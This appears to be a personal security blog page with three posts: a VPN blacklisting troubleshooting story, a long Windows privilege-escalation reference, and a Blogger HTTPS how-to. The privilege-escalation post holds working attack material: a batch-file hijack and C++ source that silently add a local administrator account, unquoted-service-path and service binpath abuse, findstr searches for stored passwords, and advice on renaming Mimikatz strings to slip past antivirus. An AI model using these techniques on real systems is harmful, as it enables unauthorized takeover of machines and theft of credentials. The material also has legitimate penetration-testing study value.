Thursday, 21 March 2019

Curioser and Curioser

So I haven't had experience with home based anti-virus in a number of years. Yes all our computers at home run av, but that will be whatever free one I can find to mitigate the risks of malware... av really doesn't do much now-a-days with malware outnumbering legitimate software.

I had a friend tag me on Facebook for some help. It was an interesting problem, which of course piqued my interest. Some sites were not working, specifically two airlines, from her PC. The error looked very much like she was being actively blocked. She assured me it worked on her phone and her phone was connected to the same network. I was on my way home from work, so all of the troubleshooting was done via FB messenger.

The error as you can see below looks interesting, add to her saying that both SingaporeAir and Emirates didn't work, but Qantas and Etihad did. I was instantly thinking Web-application firewall (WAF). WAF is interesting as most IT people don't even know what these are, so how is a smart but non-it person supposed to approach this. Also this error page is terrible, better off giving the user some guidance on how they can rectify the situation...
This looked like her IP or Browser fingerprint (I've seen a chrome plugin cause a WAF to block a user) had been blacklisted somewhere and then replicated out through the threat feeds that these WAF's get.

I noticed in the unedited screenshot that she sent me that there were other browsers. Going with my theory that the above is a WAF error, and it could be something as simple as a plugin causing the block. I asked her to try a different browser. Same error.
Now to verify the phone and computer are on the same network. Do a google for what is my IP address I said. She told me they were different. Ah hah... Give me those addresses, I say. The one she was getting on her computer looked to be owned by avast (remember I was on my way home so I did this all via mobile);


It is also was blacklisted...

I verified with my friend that she used AVG, but a quick search shows AVG VPN uses the same back-end as Avast. I explained to her why you need a VPN; for privacy, but that most of the time it is not needed, eg it is not on on her phone. Told her to turn it off and SingaporeAir and Emirates worked again.
I've since advised AVG of the issue via facebook... the only easy way I could see to contact support...

So advise to companies running WAF's. Your customers are going to get blocked, it isn't going to only be bad guys. Make your pages as helpful as possible, maybe even a link to an unblocked contact us page, or an email address they can send their long obfuscated reference number too.

Advice to endpoint security companies... Since when did you jump on the VPN bandwagon? Ok, cool, do that, sure it is a revenue stream. But please monitor your IP's for being blacklisted as they are then going to be blocked from a large number of sites. Maybe filter what your users can do on these VPN's so you don't block the vast majority of users of your service from using the internet.

Edit: I notified AVG before this post went live, published this a few days later, and checked just now.28/03/19 @ 6pm.. it is still blacklisted

Thursday, 5 April 2018

Windows Privilege escalation

This will likely be an entry I will keep coming back to and updating as I find new tricks that actually work.
First some links with some good primers;
A big list of vectors https://attack.mitre.org/wiki/Privilege_Escalation
Some good walkthroughs; https://toshellandback.com/2015/11/24/ms-priv-esc/ https://www.fuzzysecurity.com/tutorials/16.html
Finally something that gave me good ideas, I will expand upon these below. I couldn't get this to work due to missing DLL entrypoints on my chosen exe's; https://www.gracefulsecurity.com/privesc-dll-hijacking/

I am making this blog post as a reference for myself and others, and it'll be long, so I am trying out a table of contents;

Table of Contents


Recon and Scanning

Passive and active recon and scanning for windows privilege escalation takes a lot of forms. I am going to assume you've already found your way onto a host. If not you can do this through packet sniffing, some social engineering, or a leg-up in your red team engagement... I will probably do an article just on this later.

I am a fan of living off the land. Use the tools that are already installed. There are some that will make this easy, but could increase the likelihood of getting caught or simply not work due to app-whitelisting etc.

Look on the root of the drives with; icacls c:\* /CYou are looking for the below, (modify, Write and Full control respectively, obviously a group your account is a member of)
NT AUTHORITY\Authenticated Users:(M)
BUILTIN\Users:(W)
or either of those with a (F)

Then you'll need to got through subdirectories in a similar fashion. You can add a /T, but it makes it hard to find write locations with too much info.

The other option here is to use a tool from Microsoft's Sysinternals called accesschk. I've found some interesting behavior between the -d (directory) and without the -d. Without the -d it will find folders on the root of the drive.

accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*

It might be easier here to look for other files;
accesschk.exe -uwqs Users c:\*.bat
accesschk.exe -uwqs Users c:\*.cmd
accesschk.exe -uwqs Users c:\*.dll
accesschk.exe -uwqs Users c:\*.ini

There are lots of ways to escalate privileges on Windows... like a lot. But this one I wanted to put first though, as it isn't one I've seen before... it is so simple I am not sure why. I don't know if this has a name, but as I was also looking at an application that was vulnerable to DLL hijacking when I discovered it, so I've simply called it this (if it is known as something else let me know);

Script Hijacking

To understand this, you need to know how windows calls processes. As in some of the other attacks, it is all about local directory first, then the path variable is used from left to right. If you do an echo %path% you get the following;
C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;. If you have write access to that first directory you are golden, but you can keep going down the list, as long as it is a exe or script that doesn't exist in one of these other folders, you are in. You don't even have to use an exe here, a batch file, or cmd will work.

This attack exploits the path windows takes by simply beating out finding the real executable, go for the local path first.

If you find a script calls another executable and you have write access in the directory that script resides then depending on how that script is called, you could get yourself privilege escalation. Eg if you find an everyone writable directory, and inside is a startup.bat, restart.cmd or similar, and inside that user readable batch file is a call to timeout, ping, taskkill etc, and you have write access to that directory you can add a batch file called that process (eg taskkill.bat) and pass on the commands that were being sent to the true process via the full path (just to be nice so their script doesn't bomb), eg;

I found startup.bat in c:\somefolder, I have create/append to this folder, but the files themselves are marked as read only.
Inside startup.bat is a bunch of things, mainly setting some paths and variables. At the bottom of this script it calls the actual exe that is the same folder. I assume this script is run in group policy or as a scheduled task, or hardcoded to run from another executable. I didn't have local admin, but I can see the server is listening on the port that is defined in one of the variables... a good sign the exe is called with admin or system.
Just above the exe being run is;
timeout /t 5

Awesome. I don't have write to the startup.bat, but I do to the c:\somefolder (of course I could have just echo'd out path and hit one of those directories). I create a file called timeout.bat and make it hidden. Inside timeout.bat I put the below. The nice thing about the below... you can put it in any type of call, ping, tskill, taskkill, cscript, wscript etc... basically anything that has an exe in c:\windows\system32 and it will still run that bit, so no one will likely be any the wiser as the script will still work. It also gives us some details on what called it, when, and with which user.


@echo off
c:\windows\system32\%~n0.exe %1 %2 %3 %4 %5
echo %username% %time% %date% %1 %2 %3 %4 %5 %~dpnx0 >> C:\users\myuser\%~n0.txt

net user ms-admin PW-Privesc#1 /add ", 0);
net localgroup Administrators ms-admin /add


Wait for next reboot, or in my case when the scheduled task ran and likely you'll have a shiny new local admin to use, if not at least you'll have the username your script was called with. In my case, less than an hour later I had local admin.

Exploiting the path

This one should probably go to the top as all the others use this trick. But essentially the %path% variable, is a system and user variable that is used for windows to find executables, dll's and scripts.

Nltest hash passing

Stolen from here https://twitter.com/sysopfb/status/986799053668139009
Basically Nltest /server:ip-of-kali-box /query

Dll Hijacking

I mentioned this one about with the link to https://www.gracefulsecurity.com
I had issues getting this to work.
Essentially you want to find a folder that your have write to that has an EXE that is being called by an administrative user. Eg a service. Then you need either write access to that folder, or one of the folders in the system path. Then you need to find a DLL's that your target exe is calling. If that DLL doesn't exist in the local directory and you have write, put it there. If it doesn't exist on the system at all, you just need to put it in the path folder you have write to.

This is the dll I found through using dependency walker and filemon. Winmm.dll, is a pretty common DLL for dll hijacking, so it is useful to have one. Once the vendor responds I'll put my working code below and on my github for reference. I eventually found this one, that gave me some ideas; https://packetstormsecurity.com/files/93108/PuTTY-0.60-DLL-Hijacking-Exploit.html
But this is the one along with some stuff I picked up along the way cinched it; https://gist.github.com/felmoltor/488115c684463dfbbbf7555024cb4d12

Here is my final one; https://github.com/secme/Node/blob/master/Winmm.cpp. There are some big apps that are vulnerable to this, including the server-side implementation of NodeJs.exe. I've reported this to the node team in , but they've not prioritised it as a big issue.

Unquoted Paths

This one is kinda fun. Essentially you are looking for a service or even something likely to be run as admin\system that has a space in the path and no quotes around it. So a lnk file, or a service are your best bet.

Run the below to find a service that is vulnerable;
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

Lets say it returns c:\program files\secure service\version 12\service.exe. Then you simply need to create an exe that takes the name of one of the folders before it's space, depending on where you have write access. Say you have write access to c:\ you could simply drop in a program.exe and see what you catch... likely something. The system will alert users to this files existence too.
Most likely though you won't have write to c:\ but you may to "c:\program files\", so you could in the above case put an exe in there called secure.exe, further still in the above case you could put version.exe in c:\program files\secure service\ and get the same result.
I used to use iexpress for this, but in my testing it doesn't like having more commands thrown at it, eg calling c:\program files errors out trying to call the program.exe with "files".
Bat2Exe is good; http://www.f2ko.de/en/b2e.php, however a lot of AV will tend to pick files converted in this way up.
So fire-up notepad++ and save the following into a file called exe-test.cpp, should compile with MinGW-w64

/* Author: Morgan Storey (@MorganKStorey)
g++ -c exe-test.cpp & g++ -o test.exe exe-test.o
Really simple, just adds a local admin.
To do, add output to a log file so you can see what user etc called it... knowledge is power
*/
#include <windows.h>
int main(void)
{
 WinExec("cmd.exe /c net user ms-admin PW-PrivEsc#1 /add ", 0);
 Sleep(3000);
 WinExec("cmd.exe /c net localgroup Administrators ms-admin /add ", 0);
 Sleep(2000);
         return 0;
};


Git here; https://github.com/secme/Program.exe/blob/master/program.cpp

Service editing

For this you are going to have to use a 3rd party tool, though it is made by sysinternals, now owned by Microsoft, so I doubt it'll get picked up;
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Everyone" * /accepteula


You can also just open regedit and go to the below section of the registry, sometimes the registry permissions are changed and even if you don't have the permissions above you have them in the registry.
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services

The plan here of course is to edit a service and run the command you need.
Something like sc config VulnerableService binpath= "cmd /c
net localgroup Administrators youruser /add" #note the space after the = symbol.
Or just change the binpath in the registry and then wait for the service to start. Now you have a shiny new admin to do bad with.

Other poor permissions I've seen and used

Profiles

Used to be pretty common in the WinXP days to find the startup folder for all users be set to all users having write access. Not so much with Win7+
But have a look here, C:\Users\Public\Desktop\ if you have write you could modify an existing LNK file to point to a script or exe you need the admin to run... basically fishing at this point. Or better yet put it in the all users startmenu; C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup and when/if they logon you are good.

App Folders

Specific app folders like c:\python, c:\java, cygwin etc, are rife with these.

Sysprep hangovers

XML files, look through them for passwords etc. At most they'll be encoded. Their can be autologin users in the registry too.

Poor Config files

findstr /si password *.txt *.ini *.log *.xml *.cfg *.conf
findstr /si administrator *.txt *.ini *.log *.xml *.cfg *.conf

Scheduled Tasks 

By default scheduled tasks have an ACL that locks them down to the creator. Sometimes people will break this and give you an in to repoint the task to your own script, or simply replace the script it is point to.

Startup items

Like the title says, startup scripts, etc. 
These are super easy. Look for scripts referenced to the local policy, in the startup folder in the user profiles, even desktop.ini in folders can be used to leverage this.

Driver hooking


3rd Party tools

I love "living off the land", but sometimes you need a 3rd party tool as nothing else works.

Pcap/Wireshark etc

Yep there are vulnerabilities in Wireshark. But here I am more talking about setting up a capture to capture a user with higher privileges username and password, more doable than most realise. Especially when Winpcap now helpfully adds the tickbox, would you like other users to be able to run the service.

Mimikatz

First you're likely going to need to know how to bypass execution policy... there are loads of ways (or the old "powershell –ExecutionPolicy Bypass".
Then you'll need to bypass Mimikatz being detected by AV...you can literally just go through the codebase before you compile your custom version and find/replace katz for dogz to get past most signature based av.

Msfvenom

 

Incognito

 

Passthehash

 

Sysret

This one only works when the patch for MS12-042 hasn't been applied.
https://pentestlab.blog/2017/06/14/intel-sysret/ has a good rundown, essentially hook a running process to get into ring0 and run your command prompt there. Do a tasklist and find an explorer.exe, if its pid is 1234 run; sysret -pid 1234

Impersonation

These technically aren't privilege escalation, they are a way to move laterally. But putting them here as they work. I will likely split this out into a separate blog post.

Terminal services

This involves taking over another users session.

Tuesday, 6 March 2018

HTTP is dead, long live HTTPS

"FTP is deprecated, HTTP is deprecated, at least it should be now that we have secure replacements"

Really not sure where I read that quote. One of the traps of being in the industry so long. It might have been on a security mailing list back in the early naughties. I remember vehemently nodding in agreement... I've been sad for years that my own site was still not running SSL/TLS. I've endeavored a number of times to get it up to HTTPS. But see I am cheap, and I use Bloggers free service for my domain (blogger for your domain), so HTTPS wasn't available.
Well it is now, and I thought I'd do a quick how to, for those that also have blogger.

It is really simple, like blogger has been for all those years. But it looks to be a beta feature (how long did google stay in beta for...). So you need to visit https://draft.blogger.com. If you are already logged in to blogger, you'll be logged in here too.

Now simply click on settings and scroll down to the HTTPS section. Change the first drop-down to: "Yes".
Now wait about 20minutes as google generate you a https://letsencrypt.org certificate and apply it your site. Come back to this section and change the HTTPS redirect to "Yes" as well. And if like me you have multiple blogs, go through each and change them all to the same.

Obviously not a super technical post this time, but good to see even free (as in beer) services get security features of sorts.
Of course, if you have any other kind of hosting, get a letsencrypt cert and use it, the future is encrypted.

Feel like donating to me, Bitcoin; 1BASSxgFZ2j8VfXFrWJHNvYdQXDtJKAUuN or Ethererum; 0x2887D4B4fe1a7162D260CeA7E1131AF8926bd87F